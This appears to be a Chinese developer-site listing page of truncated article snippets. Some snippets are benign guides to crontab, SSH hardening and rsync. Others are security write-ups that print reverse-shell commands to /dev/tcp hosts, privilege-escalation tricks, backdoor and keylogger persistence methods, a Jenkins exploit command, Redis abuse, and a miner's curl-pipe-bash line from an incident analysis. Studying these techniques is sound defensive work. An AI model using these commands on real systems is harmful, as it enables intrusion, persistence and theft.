文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& devtcpvps的ipvps的端口 0>&1

-i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(shell script),是一种为 shell 编写的脚本程序。...优点: 靶机更换ip后依然不会丢失权限 连接方便、操作简单 相较于传统后门不易清理等优势; ::: 正向shell 可以理解为q1给q2打电话,q2接电话,完成信息接通 反弹shell 可以理解为...消息呈现方式为远程) 命令 解释 bash -i 启动交互式命令bash -i 将输出重定向到文件 /dev/tcp 靶机为Linux的设备/dev/tcp连接程序启动socket(Linux系统:所有程序都是目录文件...:(先启动监听,否则拒绝连接) sudo su nc -lv 7777 Mac执行: sudo su zsh -i > /dev/tcp/mac监听ip/mac监听端口 (ls,pwd,whoami...kali机 并无任何显示 反弹shell:linux——>(攻击)kali kali开启监听 nc -lvnp 7777 Mac攻击,执行了shell命令: bash -i >& /dev

1.9K60

crontab定时任务不执行的原因

我在网上找的时候发现网上主要说了这5个原因: 1 crond服务未启动 crontab不是Linux内核的功能,而是依赖一个crond服务,这个服务可以启动当然也可以停止。...如果停止了就无法执行任何定时任务了,解决的方法是打开它: crond 或 service crond start 如果提示crond命令不存在,可能误删除了,CentOS下可以通过这个命令重新安装:...yum -y install crontabs 2 权限问题 比如:脚本没有x执行权限,解决方法: 增加执行权限,或者用bash abc.sh的方法执行 也有可能crontab任务所属的用户对某个目录没有写权限.../bin/bash echo 123 >> testFile 我希望通过这种方式来测试 我设置的定时脚本起作用了,于是我设置了该脚本每分钟执行一次,但是死活在脚本所在目录看不到这个文件,我手动执行 #.../test1.sh,当执行到调用sh test2.sh的时候,系统会认为是从crontab文件所在的目录去找test2.sh,但是其实是找不到的,造成执行失败 最开始我想的方法是,我要将我写的待执行的脚本文件以及调用的其他的脚本

5.1K10
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Linux 提权总结

    ,保留的其原本UID (不展开说) 所以增加了一个s权限,该程序在实际运行时Effective UID就会变为0,即root的UID sudo 就是能把一个命令视作root来执行,用sudo-l查看可以...-exec执行一下/bin/bash … 编程语言 bypass python 如果python都可以用的话,那就更轻松了,os安排一下 似乎pty也行?.../SHELL变量 键入export -p 查看该用户的变量 如果这俩变量有w权,那么我们可以直接写入来bypass ssh bypass 原理是通过ssh链接当前IP的当前用户并启动/bin/bash...同时用户有修改自己环境变量的权限, 我们就可以通过劫持system函数里调用的脚本文件,使其指向我们环境变量里自行创建的一个同名脚本文件,那么这个我们自行创建的同名脚本文件就能以root权限运行了,如果这个脚本文件里的命令是...如果tar有此权限,我们可以通过此来查看敏感文件内容。

    6.2K20

    【Linux操作系统】shell和文件权限

    问题4:为什么我听说shell是一门脚本语言?这和shell是一个软件层矛盾吗? 问题5:我还听说过bash,shell和bash的关系是什么呐?...但是你还是死缠烂打,还是嚷嚷着要媒婆帮你去向如花说媒,媒婆知道如花已经有男朋友了,所以就直接拒绝了你的请求。 -----shell的作用2:对于非法用户的非法请求,直接拒绝用户,从而保护内核。...解答:我们经常说的shell也是一种脚本语言,常称为shell script,同python、js等脚本语言一样,可以使用if、while等组合逻辑将指令进行编排实现一些复杂的功能。...首先权限约束的是人,比如校长能进入校长办公室,但是我不能进入校长办公室,ps:这是因为角色问题,而不是因为某一个人,比如王刚校长撤职了,即使他还是王刚,但是因为他不再是校长的身份,所以他就不能再进入校长办公室了...其次由于事物天然的属性决定了某一个人能不能执行相应的操作,比如校长能坐在桌子上,却不能吃掉桌子,这是因为桌子只能用来做,而不能用来吃.

    1.4K30

    加固你的服务器,防止SSH攻击

    如果它捕获了太多失败的尝试,则会向防火墙添加规则,从而拒绝其连接到服务器。 在本教程中,您将安装并配置PyFilter以阻止SSH请求。...第二步、运行PyFilter PyFilter包含一个run.sh用于启动PyFilter的脚本。 首先,更改脚本权限以使其可执行。...sudo chmod +x run.sh 授予权限后,运行脚本启动PyFilter: ....在PyFilter目录中,使用脚本install.sh为PyFilter创建服务并使其在系统启动时运行。 修改脚本的执行权限: sudo chmod +x install.sh 然后启动脚本: ....要使用此功能,首先需要geoip2的Python模块,您可以使用pip安装它: pip3 install geoip2 安装此模块后,重新启动PyFilter以识别新模块: sudo systemctl

    2K20

    emp3r0r:dropper和ELF加密壳

    比如python(我知道这不是bash,但你还得从bash或者别的什么shell来加载python吧?) python实现这一点是通过ctypes。...根据sektor7的文章,思路大致是: 加载libc到当前python进程 使用mmap分配一块具有写入和执行权限的内存区域 把shellcode写进去 cast我们的shellcode buffer...我们的bash脚本启动一个sleep进程,然后使用dd来替换当前bash,最后dd就成为了sleep的父进程。 然后,我们把shellcode写到sleep的text段某处,等待它被执行。...这个功能可以让其它后渗透工具(如cobalt strike)的agent通过emp3r0r的通信隧道连接它们自己的CC服务 2.使用GDB对目标主机的进程注入shellcode,或者对自行启动的子进程注入...(如果权限不足)。

    1.1K10

    如何在 Linux 中运行一个 Shell 脚本

    方法 1:通过将文件作为参数传递给 shell 以运行 shell 脚本 第一种方法涉及将脚本文件的名称作为参数传递给 shell 。...考虑到 bash 是默认 shell,你可以像这样运行一个脚本bash hello.sh 你知道这种方法的优点吗?你的脚本不需要执行权限。对于简单的任务非常方便快速。...例如,我已安装了 zsh ,并使用它来运行相同的脚本: 使用 Zsh 来执行 Shell 脚本 方法 2:通过具体指定 shell 脚本的路径来执行脚本 另外一种运行一个 shell 脚本的方法是通过提供它的路径...否则,当你尝试执行脚本时,你将会得到 “权限拒绝” 的错误。 因此,你首先需要确保你的脚本有可执行权限。...如果你使用 zsh 的特殊语法,你可以通过脚本的第一行添加 #! /bin/zsh 的方式来标识其是 zsh 脚本。 在 #! 和 /bin/bash 之间的空格是没有影响的。你也可以使用 #!

    3.5K20

    Linux通过第三方应用提权实战总结

    3、第三方应用提权,某些程序使用root权限启动,如果第三方服务或者程序存在漏洞或者配置问题,可以利用来获得root权限。...如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行 通过find命令给wget命令提供SUID权限 ?...Kali上启动一个python服务器 python -m SimpleHTTPServer 8000 将Kali上的passwd文件下载到靶机etc目录下并覆盖原来的passwd文件 wget -O passwd...git提权 git命令分配了root权限 ? 利用git来提权; sudo git help add !/bin/bash ? ?...上传脚本;执行后成功; ? vi提权 vi命令分配了root权限 ? 运行sudo -l发现该用户可以任意用户执行vi,按esc后输入:!/bin/bash直接提权至root。

    1.5K20

    Linux权限维持|内网渗透学习(十二)

    启动/usr/bin/sshd, 这是原始sshd, 原始的sshd监听端口建立了tcp连接后, 会fork一个子进程处理具体工作。...keys 默认权限为600 另外可以通过touch修改时间戳, 让新上传的文件时间戳改为旧文件时间戳 service ssh restart ssh keylogger(alias设置操作别名) 编辑当前用户下的...setgid: 该权限只对目录有效, 目录设置该位后, 任何用户在此目录下创建的文件都具有和该目录所属的组相同的组 #include void main(int argc,...扩展, 默认安装的话都有python扩展 脚本可以放到python的扩展目录 cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c "pyfile.../bin/bash nc -l -v -p 4444 -e /bin/bash 2>/dev/null &/bin/uname $@ 其他可执行程序也可以尝试通过这种方式进行劫持, 是否成功取决于原可执行文件所在目录之前的其他

    1.1K32

    Python与系统日常管理

    于是就免不了要写许多自动化脚本的东西,来方便系统日常管理了。 bash脚本挺让人恶心的,属于dirty and quick一类。...而Python语法清新可人,Python与系统的交互也极其便利,写自动化脚本再合适不过。...舒服多了 有了sh,就可以方便地用python写逻辑,而与系统的交互依然使用shell指令 sh并没有自己去实现一遍系统指令(也不现实),sh的原理很有趣,是通过ModuleType来实现的。...当然学习成本也是在不低,edX就是用它来自动化部署的,有200+ task好像 用户身份与进程权限顺便提一下用户身份与进程权限python脚本中与系统交互(操作文件等),必然涉及到权限问题,所以我们需要了解...终于轮到我们的python进程登场啦,python进程从shell中启动python权限为执行它的用户的权限,此后python中调用的shell指令则为python的子进程,权限python相同

    88460

    特别的往 Docker Container 中上传代码的技巧

    仔细思考,> 是 bash 本身的语法指令,这条指令的执行者是 bash通过 sudo 程序提权执行的 cat,具有超级用户的权限,而 cat 在这里只负责输出,并没有读写功能,真正写文件的操作者 bash...我们只需要另外启动一个具备超级用户权限bash shell,就可以正常运行这段脚本了,sudo bash,或者 sudo su 都可以。...想到 Python 可以利用 -c 参数,通过 python -c "需要一次性执行的Python命令" 来直接在命令行运行一些一次性完成的操作。bash 有没有这样的操作呢?...所以要这么实现的话,我们直接用: sudo bash -c "cat > test.txt" 这时启动了一个具有超级用户权限、只执行 cat > test.txt 的 bash,就能实现在当前用户不可写入的目录写入一个...test.txt 了,看来 Python 的参数的设计也有模仿 bash 的啊。

    1.2K20

    CVE-2019-1003000-jenkins-RCE复现

    该漏洞通过将AST转换注释(如@Grab)应用于源代码元素,可以在脚本编译阶段避免脚本安全沙箱保护。...拉取完成之后,开始运行环境,但是一直没有启动来,一运行启动命令,ps查看都没有容器实例: ? 再次编辑运行脚本,去掉--rm子命令,不用自动移除相同名称的容器。...再次运行之后,docker ps -a查看能够发现环境实例存在,但是docker ps没有,上一条的命令显示环境一启动就退出了,通过日志命令docker logs container_id 排查: ?...发现是权限问题,本地的jenkinsdata文件夹是root权限,而jenkins的权限很小,uid等信息都是1000,所以修改jenkinsdata的权限并删除之前的容器再次运行脚本,即可启动环境:...user1 --cmd "bash -i >& /dev/tcp/192.168.0.102/12345 0>&1" ?

    4.2K20

    Shell编程实战

    什么是Shell脚本 当命令或者程序语句不是在命令行中执行,而是通过一个程序文件来执行时,这个程序就称作Shell脚本。...注意文件的可执行权限,与用户身份 #清除脚本日志 cd /var/log cat /dev/null > messages echo "Logs cleaned up . done" Shell脚本语言的种类...其他的脚本语言 php Perl Python 语言选择 Shell脚本语言优势在于处理系统底层的业务,基于linux命令处理也是最快的,常用语开发自动化安装,监控报警,软件启动脚本。.../usr/bin/env python 执行Shell脚本的方式 bash 脚本名 sh 脚本名 此方法是脚本没有可执行权限时,或者文件头没指定解释器时用的方法 path/scriptName.../scriptName 此方法需要脚本有可执行权限,chmod +x scriptName source scriptName . scriptName 加载并执行脚本文件中的命令和语句 [root

    1K30

    redis未授权访问个⼈总结

    如果键的值中有空格,需要使⽤双引号括起来,如"Hello World"; Redis配置⽂件解读: 在启动Redis服务器进程的时候,可以通过命令⾏参数指定⼀个配置⽂件,这样服务器进程就可以根据配置⽂件中设定的参数值来运.../redis-server 可以指定配置文件启动(若不指定则以默认的配置文件启动): ....POC-T框架里的利用代码: 未不避免排版错乱,影响阅读体验,通过阅读原文获取 三、 利用redis写webshell 当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时...:  redis 2.6以前的版本内置了lua脚本环境,在有连接redis服务器的权限下,可以利用lua执行系统命令。...python清洗脏数据。

    1.6K40

    记一次 Linux 入侵,服务器变“矿机”全过程

    我放下酸菜馅的包子,SSH 连了一下,拒绝了,问了下默认的 22 端口被封了。...边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务: crontab -e ? 果然,线索找到了。...这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多。 接下来安装 Bash,最后是继续下载第二个脚本 bsh.php,并且执行。...-c 'curl -fsSL 159.89.190.243/rsh.php|bash' 2>/dev/null 这段脚本的代码比较长,但主要的功能有 4 个: 下载远程代码到本地,添加执行权限,chmod...总结 通过依次分析这 3 个脚本,就能看出这个病毒的可怕之处,先是通过写入 ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过 Redis 漏洞复制,迅速在全网传播,以指数级速度增长

    1.3K30

    使用rsync进行主机间数据同步及其他工具

    顾名思意,它是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。...rsync 包括如下的一些特性: 能更新整个目录和树和文件系统; 有选择性的保持符号链链、硬链接、文件属于、权限、设备以及时间等; 对于安装来说,无任何特殊权限要求; 对于多个文件来说,内部流水线减少文件等待的延时...inotifywait用于等待文件或者文件集上的一个特定事件,可以监控任何文件或者目录位置,并且可以递归地监控整个目录树;inotifywatch 用于收集监控的文件系统统计数据,包括每个inotify...编写测试脚本 #!...同步脚本 #!

    32610
    点击加载更多

    扫码

    添加站长 进交流群

    领取专属 10元无门槛券

    手把手带您无忧上云

    扫码加入开发者社群

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287

      领券